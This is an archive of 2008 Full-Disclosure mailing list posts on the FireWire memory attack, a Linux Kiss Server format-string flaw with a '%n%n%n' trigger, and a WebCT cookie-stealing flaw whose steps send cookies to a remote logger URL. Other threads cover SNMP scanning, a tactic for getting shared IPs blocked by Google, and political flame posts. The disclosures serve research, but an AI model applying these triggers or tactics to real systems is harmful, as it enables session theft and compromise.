http://security.gentoo.org/glsa/glsa-200803-09.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). 
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzdUouhJ+ozIKI5gRAqoGAJ47fARNyjNN6tMh5+16Hm2KBadmUQCeL+CN 2+oHbJ2FRiLnzJ5Ein7ta7E= =Lfy+ -----END PGP SIGNATURE----- From foojipe at gmail.com Tue Mar 4 23:33:27 2008 From: foojipe at gmail.com (jipe foo) Date: Wed, 5 Mar 2008 00:33:27 +0100 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> Message-ID: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> 2008/3/4, Ivan . : > http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html > Here is a (totally unofficial) mirror of Metlstorm's files in case you can't reach his overloaded website :-\ http://www.hotsecuritynews.com/fearwire/ Again, very nice work Metlstorm ! From steven at securityzone.org Tue Mar 4 23:41:39 2008 From: steven at securityzone.org (Steven Adair) Date: Tue, 4 Mar 2008 18:41:39 -0500 (EST) Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> Message-ID: <4160.65.88.218.157.1204674099.squirrel@slashmail.org> I guess the release of this tool makes physical access pen-tests a little bit easier huh? Will have to try this out some time. Steven > http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html > > _______________________________________________ > Full-Disclosure - We believe in it. 
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From dancho.danchev at gmail.com Tue Mar 4 15:52:58 2008
From: dancho.danchev at gmail.com (Dancho Danchev)
Date: Tue, 4 Mar 2008 07:52:58 -0800
Subject: [Full-disclosure] ZDNet Asia and TorrentReactor IFRAME-ed
Message-ID:

An in-depth overview of a currently active malware IFRAME campaign, that's targeting ZDNet Asia and TorrentReactor's search engine optimization practices of generating, and locally caching the search queries pages, thereby positioning the now cached popular keywords with the IFRAME between the first ten to twenty search results, taking advantage of the sites' high page ranks. The current state of the exploitation technique used, allows the malicious parties to basically inject as many, and as diverse keywords, presumably taking advantage of today's world events. Sample redirects, lead me to known Russian Business Network netblocks and ex-customers in the face of rogue anti-virus and anti-spyware applications, as well as fake codecs.

http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

Regards
--
Dancho Danchev
Cyber Threats Analyst/Blogger
http://ddanchev.blogspot.com
http://windowsecurity.com/Dancho_Danchev

From Larry at larryseltzer.com Wed Mar 5 00:00:33 2008
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Tue, 4 Mar 2008 19:00:33 -0500
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
In-Reply-To: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com>
References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>

The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine.
The machine is then tricked into allowing the attacking computer to have read and write access to its memory. " I assume this makes it a local login, not a domain login. "Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire." So does the same capability exist on Macs? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com From worriedsecurity at googlemail.com Wed Mar 5 02:13:00 2008 From: worriedsecurity at googlemail.com (worried security) Date: Wed, 5 Mar 2008 02:13:00 +0000 Subject: [Full-disclosure] us cyber command In-Reply-To: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> Message-ID: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> On Mon, Mar 3, 2008 at 2:31 PM, worried security wrote: > [02:40] do you think cyber terrorism is real or its just the > government softening ppl up for a couple of false flags for a reason > to bomb iran? > [02:49] the u.s are still deciding where to build the cyber > command, so don't expect any die hard style false flags till 2009 > [02:50] they said their false flag cyber command would be up > and running by december 2008 > [02:50] so they will test out their capabilities probably 2009/10 > Mar 03 22:50:50 bunch of skript kiddos with DDoS nets... this is why ppl will stop posting vulnerabilities to mailing lists, so the enemy can't use it against their countries Mar 03 22:51:10 huh? 
Mar 03 22:53:22 for instance do you think UK/china/iran hackers are going to keep posting to mailing lists vulnerabilties jsut so the script kids at the US cyber command can copy and paste the code to black out our electricity grids etc? Mar 03 22:53:25 http://www.ktbs.com/news/Ad-promote-Cyber-command-9337/ Mar 03 22:54:00 we will stop feeding the mailing lists the "cyber ammo" so the us cyber command can't attack our countries Mar 03 22:55:25 the us cyber command are advertising a cyber war on news articles, but do they realise what will happen if their is a cyber war? no will will post to the mailing lists anymore. Mar 03 22:55:55 the us government are the biggest dumb asses who dont think things through Mar 03 22:56:24 it will stop new techniques getting publically disclosed etc Mar 03 22:56:44 because nonUS hackers dont want to give the US gov ideas on how to hack non US countries Mar 03 22:57:07 we're already in a cyber war. Mar 03 22:57:23 so i hope the fucking us gov cyber command have good security researchers to find their own vulns and techniques Mar 03 22:57:49 cos their enemies wont post on the mailign lsits if cities start getting blacked out by US gov Mar 03 22:59:07 they do. Mar 03 22:59:18 oh have they hired hd moore? Mar 03 23:00:13 trust me the us gov rely on whats post to the mailing lsits as much as everyone else Mar 03 23:00:31 we are in a cyber war? sheeeesh last night we were in a trojan war Mar 03 23:00:35 and if they start attacking other nations when the cyber command is built Mar 03 23:00:49 then non-us hackers will stop posting to mailing lsits Mar 03 23:01:06 then the whole security community will fuck up Mar 03 23:01:23 the cyber command is nothing new. Mar 03 23:01:31 it is Mar 03 23:01:34 It is just a structural reorganization. Mar 03 23:01:41 its more than that Mar 03 23:01:55 this is about attacking nations Mar 03 23:01:59 you actually think that everything they are advertising isn't going on already? 
Mar 03 23:02:31 not on a big a scale as their planning Mar 03 23:02:53 60,000+ cyber command staff in a purpose built cyber battle center Mar 03 23:03:53 these dorks will bring the end to the security community as we know it the dumb asses Mar 03 23:04:17 nothing will get publically disclosed if real cyber war breaks out Mar 03 23:06:06 it's not going to be as big as you think. Mar 03 23:06:24 It's going to put a lot of existing jobs and stations under a central command. Mar 03 23:07:20 a strategic command? Mar 03 23:07:57 yes.. US Strategic Command will be in the mix somewhere. Mar 03 23:15:50 how many real hackers out of the hundreds of script kids will they hire Mar 03 23:16:13 there aint that many "elite" hackers out there Mar 03 23:16:28 that's where defense contractors come in. Mar 03 23:20:24 what do you mean Mar 03 23:23:00 a lot of talent consults for the government. Mar 03 23:23:30 a chinese defence contractor is going to give hackers to us so the us can black out chinese infrastructure when us get angry with china? Mar 03 23:24:11 there are plenty of chinese foreign nationals working for the US government. Mar 03 23:29:36 I'm off to bed. Goodnight. From eric at rachner.us Wed Mar 5 02:13:10 2008 From: eric at rachner.us (Eric Rachner) Date: Tue, 4 Mar 2008 18:13:10 -0800 Subject: [Full-disclosure] Hack into a Windows PC - no password needed In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local> Message-ID: <003301c87e66$77981a40$66c84ec0$@us> Actually, it's full system compromise -- if the machine is joined to a domain, then any domain account credentials known to that machine are compromised as well. And yes, the same capability exists not only on Macs but on any computer that implements the Firewire specification. 
(details at http://storm.net.nz/projects/16) - Eric -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: Tuesday, March 04, 2008 4:01 PM To: Untitled Subject: Re: [Full-disclosure] Hack into a Windows PC - no password needed The key to the vulnerability: "To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine. The machine is then tricked into allowing the attacking computer to have read and write access to its memory. " I assume this makes it a local login, not a domain login. "Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire." So does the same capability exist on Macs? Larry Seltzer eWEEK.com Security Center Editor http://security.eweek.com/ http://blogs.pcmag.com/securitywatch/ Contributing Editor, PC Magazine larry.seltzer at ziffdavisenterprise.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- A non-text attachment was scrubbed... 
Name: winmail.dat
Type: application/ms-tnef
Size: 2950 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/311d35ac/attachment.bin

From Valdis.Kletnieks at vt.edu Wed Mar 5 02:38:34 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 04 Mar 2008 21:38:34 -0500
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
In-Reply-To: Your message of "Tue, 04 Mar 2008 19:00:33 EST." <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>
References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com> <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>
Message-ID: <10008.1204684714@turing-police.cc.vt.edu>

On Tue, 04 Mar 2008 19:00:33 EST, Larry Seltzer said:

> So does the same capability exist on Macs?

What, don't you remember? :)

Google for the phrase "Owned by an iPod"...

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 226 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/d67cf955/attachment.bin

From vashnukad at vashnukad.com Wed Mar 5 03:43:25 2008
From: vashnukad at vashnukad.com (vashnukad)
Date: Tue, 4 Mar 2008 22:43:25 -0500
Subject: [Full-disclosure] Vulnerability in Linux Kiss Server v1.2
Message-ID:

From: vashnukad at vashnukad.com
Site: http://www.vashnukad.com
Application: Linux Kiss Server v1.2
Type: Format strings
Priority: Medium
Patch available: No

The Linux Kiss Server contains a format strings vulnerability that, if run in foreground mode, can be leveraged for access. The vulnerability is demonstrated in the code below:

Function log_message():

    if(background_mode == 0)
    {
        if(type == 'l')
            fprintf(stdout,log_msg);
        if(type == 'e')
            fprintf(stderr,log_msg);
        free(log_msg);
    }

Function kiss_parse_cmd():

    /* check full command name */
    if (strncmp(cmd, buf, cmd_len))
    {
        asprintf(&log_msg,"unknow command: `%s'", buf);
        log_message(log_msg,'e');
        goto error;
    }
    buf += cmd_len;

So putting something like %n%n%n in 'buf' you can trigger the vulnerability.

--
Name: Vashnukad
E-mail: vashnukad at vashnukad.com
Site: http://www.vashnukad.com

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080304/6f14a523/attachment.html

From slythers at gmail.com Wed Mar 5 04:43:58 2008
From: slythers at gmail.com (Slythers Bro)
Date: Wed, 5 Mar 2008 05:43:58 +0100
Subject: [Full-disclosure] us cyber command
In-Reply-To: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com>
References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com>
Message-ID: <8f6a58a30803042043k5cb30bd8h4a521ccf207dcb64@mail.gmail.com>

Mar 03 23:00:49 then non-us hackers will stop posting to mailing lsits

you will stop posting php include exploit ?
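
[Added example, not part of any list message and not the Kiss Server project's code.] The Linux Kiss Server advisory above shows a message built with a fixed format and then handed to fprintf() as the format itself. The C sketch below reproduces that two-pass pattern next to the hardened "%s" form; the function names, the rendering into a buffer instead of stdout/stderr, and the constructed input "PLAY 100%%" are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fixed format string as it appears in the advisory's kiss_parse_cmd() excerpt. */
#define UNKNOWN_CMD_FMT "unknow command: `%s'"

/*
 * First pass, as in kiss_parse_cmd(): the client-supplied text is an ARGUMENT
 * to a fixed format, so this step is safe on its own.
 * snprintf() + malloc() stands in for asprintf() to stay within standard C.
 * The caller frees the returned string.
 */
static char *build_unknown_cmd_msg(const char *buf)
{
    int need = snprintf(NULL, 0, UNKNOWN_CMD_FMT, buf);
    char *log_msg;

    if (need < 0)
        return NULL;
    log_msg = malloc((size_t)need + 1);
    if (log_msg == NULL)
        return NULL;
    snprintf(log_msg, (size_t)need + 1, UNKNOWN_CMD_FMT, buf);
    return log_msg;
}

/*
 * Second pass, as in log_message(): the finished message is used as the
 * FORMAT, so every '%' the client sent is interpreted a second time.
 * It is only exercised here with "%%", the one directive that consumes no
 * argument; any other directive would read arguments that were never passed.
 * The pragmas silence the compiler warning for this deliberately flawed call.
 */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
static int render_vulnerable(char *out, size_t n, const char *log_msg)
{
    return snprintf(out, n, log_msg);
}
#pragma GCC diagnostic pop

/*
 * Hardened second pass: the message is data, the format is a constant.
 * The equivalent fix in log_message() is fprintf(stream, "%s", log_msg)
 * or fputs(log_msg, stream).
 */
static int render_hardened(char *out, size_t n, const char *log_msg)
{
    return snprintf(out, n, "%s", log_msg);
}

int main(void)
{
    /* Constructed client input: the bytes P L A Y, space, 1 0 0, '%', '%'. */
    const char *client_buf = "PLAY 100%%";
    char vulnerable[128], hardened[128];
    char *log_msg = build_unknown_cmd_msg(client_buf);

    if (log_msg == NULL)
        return 1;
    render_vulnerable(vulnerable, sizeof vulnerable, log_msg);
    render_hardened(hardened, sizeof hardened, log_msg);
    /* The vulnerable path collapses "%%" to "%": proof the input was parsed. */
    printf("vulnerable: %s\nhardened:   %s\n", vulnerable, hardened);
    free(log_msg);
    return 0;
}
```

Building with -Wformat -Wformat-security makes GCC and Clang flag a call like the one in render_vulnerable() at compile time, which is the quickest way to find other instances of this pattern in a code base.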
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/1c268b74/attachment.html From redhowlingwolves at nc.rr.com Wed Mar 5 05:33:13 2008 From: redhowlingwolves at nc.rr.com (scott) Date: Wed, 05 Mar 2008 00:33:13 -0500 Subject: [Full-disclosure] us cyber command In-Reply-To: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com> <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com> Message-ID: <47CE3099.6070403@nc.rr.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 worried security wrote: > On Mon, Mar 3, 2008 at 2:31 PM, worried security > wrote: >> [02:40] do you think cyber terrorism is real or its just the >> government softening ppl up for a couple of false flags for a reason >> to bomb iran? >> [02:49] the u.s are still deciding where to build the cyber >> command, so don't expect any die hard style false flags till 2009 >> [02:50] they said their false flag cyber command would be up >> and running by december 2008 >> [02:50] so they will test out their capabilities probably 2009/10 >> > > Mar 03 22:50:50 bunch of skript kiddos with DDoS nets... > this is why ppl will stop posting vulnerabilities to mailing lists, so > the enemy can't use it against their countries > Mar 03 22:51:10 huh? > Mar 03 22:53:22 for instance do you think UK/china/iran > hackers are going to keep posting to mailing lists vulnerabilties jsut > so the script kids at the US cyber command can copy and paste the code > to black out our electricity grids etc? 
> Mar 03 22:53:25 > http://www.ktbs.com/news/Ad-promote-Cyber-command-9337/ > Mar 03 22:54:00 we will stop feeding the mailing lists the > "cyber ammo" so the us cyber command can't attack our countries > Mar 03 22:55:25 the us cyber command are advertising a cyber > war on news articles, but do they realise what will happen if their is > a cyber war? no will will post to the mailing lists anymore. > Mar 03 22:55:55 the us government are the biggest dumb asses > who dont think things through > Mar 03 22:56:24 it will stop new techniques getting > publically disclosed etc > Mar 03 22:56:44 because nonUS hackers dont want to give the > US gov ideas on how to hack non US countries > Mar 03 22:57:07 we're already in a cyber war. > Mar 03 22:57:23 so i hope the fucking us gov cyber command > have good security researchers to find their own vulns and techniques > Mar 03 22:57:49 cos their enemies wont post on the mailign > lsits if cities start getting blacked out by US gov > Mar 03 22:59:07 they do. > Mar 03 22:59:18 oh have they hired hd moore? > Mar 03 23:00:13 trust me the us gov rely on whats post to > the mailing lsits as much as everyone else > Mar 03 23:00:31 we are in a cyber war? sheeeesh last night > we were in a trojan war > Mar 03 23:00:35 and if they start attacking other nations > when the cyber command is built > Mar 03 23:00:49 then non-us hackers will stop posting > to mailing lsits > Mar 03 23:01:06 then the whole security community will fuck up > Mar 03 23:01:23 the cyber command is nothing new. > Mar 03 23:01:31 it is > Mar 03 23:01:34 It is just a structural reorganization. > Mar 03 23:01:41 its more than that > Mar 03 23:01:55 this is about attacking nations > Mar 03 23:01:59 you actually think that everything they are > advertising isn't going on already? 
> Mar 03 23:02:31 not on a big a scale as their planning > Mar 03 23:02:53 60,000+ cyber command staff in a purpose > built cyber battle center > Mar 03 23:03:53 these dorks will bring the end to the > security community as we know it the dumb asses > Mar 03 23:04:17 nothing will get publically disclosed if > real cyber war breaks out > Mar 03 23:06:06 it's not going to be as big as you think. > Mar 03 23:06:24 It's going to put a lot of existing jobs and > stations under a central command. > Mar 03 23:07:20 a strategic command? > Mar 03 23:07:57 yes.. US Strategic Command will be in the mix somewhere. > Mar 03 23:15:50 how many real hackers out of the hundreds of > script kids will they hire > Mar 03 23:16:13 there aint that many "elite" hackers out there > Mar 03 23:16:28 that's where defense contractors come in. > Mar 03 23:20:24 what do you mean > Mar 03 23:23:00 a lot of talent consults for the government. > Mar 03 23:23:30 a chinese defence contractor is going to > give hackers to us so the us can black out chinese infrastructure when > us get angry with china? > Mar 03 23:24:11 there are plenty of chinese foreign nationals > working for the US government. > Mar 03 23:29:36 I'm off to bed. Goodnight. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > I just want to know, since you are (supposedly) an informant to all the US gov domains, how you don't have a clue as to the capabilities of any country with hackers, disassemblers and people in general that strive to find vulnerabilities in software? Same sh*t, same 'King of Ridiculous'. What do you know about finding vulnerabilities, by the way? Yeah, I ended my sentence with a preposition. 
Regards, Scott -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzjCZs+9h2X0fCGcRAlsQAJ4jzBdQnixeNmONMsWNZLbwZvxnWwCfbzHw Vk4iRfmmuf81XF0Ux8iKZzQ= =3xcU -----END PGP SIGNATURE----- From mikie.simpson at gmail.com Wed Mar 5 09:18:16 2008 From: mikie.simpson at gmail.com (Michael Simpson) Date: Wed, 5 Mar 2008 09:18:16 +0000 Subject: [Full-disclosure] lets go vishing In-Reply-To: <47CDA1A2.14414.1BA737E@stuart.cyberdelix.net> References: <47CDA1A2.14414.1BA737E@stuart.cyberdelix.net> Message-ID: <82abd3a70803050118n548f4e1dhd834da3230a31f0@mail.gmail.com> On 3/4/08, lsi wrote: > [19:15] lsi2lsi: hiya! ... so i was nearly vished today ... > [19:16] lsi2lsi: mobile rings - hello, we're calling from Lloyds TSB, /schnip --from whocallsme.com I have contacted Adeptra (note spelling) to ask them if they are the owners of this number. However, if they have themselves sold the number on to yet another party, I have asked for the details so we can hunt down who is running this scam. Adeptra are based at Forbury Court, 12 Forbury Road, Reading, Berkshire, RG1 1SB Main telephone number is 0118 938 7000 (so I guess Miss Roberts is a direct number (938 7023) at that address). 
their website is www.adeptra.com have phun mike From balupton at gmail.com Wed Mar 5 12:08:48 2008 From: balupton at gmail.com (Benjamin 'balupton' Lupton) Date: Wed, 5 Mar 2008 21:08:48 +0900 Subject: [Full-disclosure] WebCT 4.x Javascript Session Stealer Exploits Message-ID: <01df01c87eb9$b5fdae50$21f90af0$@com> WebCT 4.x Javascript Session Stealer Exploits Software: WebCT Campus Edition 4.x (http://secunia.com/product/3280/) Affected Version: 4.1.5.8 Discoverer: Benjamin "balupton" Lupton Date Discovered: November 2005 Date Reported: 25/06/2007 Software Author Contacted (again) on: 20/07/2007 Date Published: 05/03/2008 Published At: http://www.balupton.com/blogs/dev?title=webct_session_stealer_exploit http://www.balupton.com/documents/webct_exploits.txt Attack Type: Javascript Session Stealer Exploit. Description: Mail & Discussion Board messages are not properly checked for javascript, allowing javascript to perform a session stealing attack (allowing the attacker to be logged in as the victim). Tested On: Attacks were tested fully on eCentral TAFE's WebCT System in November 2005 (with permission of staff), and again on Curtin University's WebCT System in June 2006 (but this time only to see if the javascript will run). Action Taken: Contacted TAFE lecturers and administrators, who didn't really care. Contacted WestOne multiple times, but never recieved any response. Then contacted Secunia, which would not publish as the discoverer did not own their own copy of the software in question. Published as WebCT is being phased out, with Blackboard being the replacement. Steps: The attacker publishes the exploit code in a message with "Don't wrap text" enabled. The victim accesses the attacker's message and their cookies are sent to the attacker's remote logger. The attacker then logs into the system and replaces his/her cookies with the acquired cookies. 
- Cookies are formatted as follows within the "value" attribute: CookieName=CookieValue; NextCookieName=NextCookieValue;
The attacker is now logged into the system as the victim.

In this case the logger is located here: http://www.balupton.com/sandbox/logger.php?pass_code=secret_key

Notes:
Victims must be students (attack does not work on non students, eg. teachers/admins).
Attack 2 will also run in Opera, but fails to retrieve the document.cookie value.
Attack 2 uses a base64 encoded javascript which is executed.
Both attacks can be customized to allow any javascript to run.
Javascript can also be developed to post a mail or discussion board message, this works for all types of victims.

Resources:
Attack Code: See below
Logger: http://localhost.balupton.com/sandbox/logger.php?pass_code=secret_key&show_source=true
Base64 Decoder / Encoder: http://www.balupton.com/sandbox/base64.php
Cookie Editor: Firefox - http://editcookies.mozdev.org/ , Opera - Built In

Attack 1 - IE6SP2 Exploit (Automatic):
Thank you
Attack 2 - Firefox Exploit (Manual):

Click Me!

Attack 2 - Firefox Exploit (Manual) - Decoded:

From gluttony at gmail.com Wed Mar 5 12:54:16 2008
From: gluttony at gmail.com (Andrew A)
Date: Wed, 5 Mar 2008 04:54:16 -0800
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <20080304085355.GA19264@suse.de>
References: <20080304085355.GA19264@suse.de>
Message-ID: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>

hey dude, how is merely sending a single datagram not going to be faster than doing an entire handshake?

On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer wrote:

> This is not true. I doubt there is any measurable advantage
> of UDP vs. TCP scans if you do it right.
>
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/b494bc0d/attachment.html

From security.research.labs at gmail.com Wed Mar 5 13:15:55 2008
From: security.research.labs at gmail.com (Dmitry)
Date: Wed, 5 Mar 2008 15:15:55 +0200
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
Message-ID:

dude, you don't need the entire handshake for tcp scanning.

On Wed, Mar 5, 2008 at 2:54 PM, Andrew A wrote:

> hey dude, how is merely sending a single datagram not going to be faster
> than doing an entire handshake?
>
> On Tue, Mar 4, 2008 at 12:53 AM, Sebastian Krahmer
> wrote:
>
> > This is not true. I doubt there is any measurable advantage
> > of UDP vs. TCP scans if you do it right.
> >
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080305/00700442/attachment.html

From krahmer at suse.de Wed Mar 5 13:21:01 2008
From: krahmer at suse.de (Sebastian Krahmer)
Date: Wed, 5 Mar 2008 14:21:01 +0100
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
Message-ID: <20080305132101.GA19179@suse.de>

Hi dude,

On Wed, Mar 05, 2008 at 04:54:16AM -0800, Andrew A wrote:

> hey dude, how is merely sending a single datagram not going to be faster
> than doing an entire handshake?

First, to know whether a TCP port is open you do not need a complete handshake. A single TCP packet is enough. I doubt that a single TCP packet is slower than a single UDP packet.

Second you may need to send multiple (same) UDP packets since remote peer's rate limiting does not send you back ICMPs; all due to the unreliable nature of UDP.

But the most important thing is, that if you do it large scale*, you have to wait for some sort of reply anyways, either TCP SYN|ACK or some application data. This time of "waiting" can be used to SYN/request yet another 10,000 hosts. Thus, how fast a scanner is does not depend on UDP or TCP, it depends on the upper protocols. Even complex protocols such as SSH can be spoken very quickly and only require a little more time (if at all) than walking a couple of SNMP OID's per host. 10,000+ hosts/s for a common application TCP protocol such as HTTP is easy.
Do not bash me if a UDP app scan takes 10 minutes to succeed and I need 11, we talk about *differences* :-)

* speaking about application level which needs some request/responses in both, UDP and TCP, cases

regards,
Sebastian

--
~
~ perl self.pl
~ $_='print"\$_=\47$_\47;eval"';eval
~ krahmer at suse.de - SuSE Security Team
~ SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)

From erey at ernw.de Wed Mar 5 14:00:08 2008
From: erey at ernw.de (Enno Rey)
Date: Wed, 5 Mar 2008 15:00:08 +0100
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <20080305132101.GA19179@suse.de>
References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <20080305132101.GA19179@suse.de>
Message-ID: <20080305140008.GF66241@ws23.ernw.de>

Hi,

> all due to the unreliable nature of UDP.
>
> But the most important thing is, that if you do it large scale*,
> you have to wait for some sort of reply anyways,
> either TCP SYN|ACK or some application data. This time of "waiting"
> can be used to SYN/request yet another 10,000 hosts.
> Thus, how fast a scanner is does not depend on UDP or TCP,
> it depends on the upper protocols.

it mainly depends on the implementation of the scanner. We did some large scale internet SNMP scanning some time ago [see http://www.ernw.de/content/e7/e181/e671/download690/ERNW_026_SNMP_HitB_Dubai_2007_ger.pdf] and used our own scanning tool [http://www.ernw.de/download/snmpattack.pl]. Within the different releases of the tool there were _big_ differences as for the scanning speed.

thanks,

Enno

--
Enno Rey

Check out www.troopers08.org!

ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel.
+49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902
PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1

Commercial register Heidelberg: HRB 7135
Managing directors: Roland Fiege, Enno Rey

From times at krr.org Wed Mar 5 14:46:25 2008
From: times at krr.org (Times Enemy)
Date: Wed, 05 Mar 2008 07:46:25 -0700
Subject: [Full-disclosure] Goolag Perk and Annoyance
Message-ID: <47CEB241.3020604@krr.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Greetings.

I preface that this is not a discovery, but rather a simple observation.

http://www.goolag.org

I am finding that it takes only a few seconds for Google to block query requests, BY IP! With this in mind, Goolag Scanner is actually an effective annoyance tool against large networks. Simply conduct a Goolag Scan from a heavily populated network, with a couple hundred Dorks, and anyone who uses the same public IP address which was used for the Goolag Scan will have to go through an extra CAPTCHA step to finish their Google queries. If they use a Google toolbar of some sort, Google may not even offer them a CAPTCHA option to continue with the search query.

Within "most" corporate networks, what effective methods can be used, from the network's perspective, to block mass Google queries?

.te

From sub at room641a.net Wed Mar 5 13:20:21 2008
From: sub at room641a.net (sub)
Date: Wed, 5 Mar 2008 08:20:21 -0500
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com>
Message-ID: <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com>

That single UDP datagram is definitely faster. Compare the Code Red worm to Sapphire (SQL Slammer), for instance:

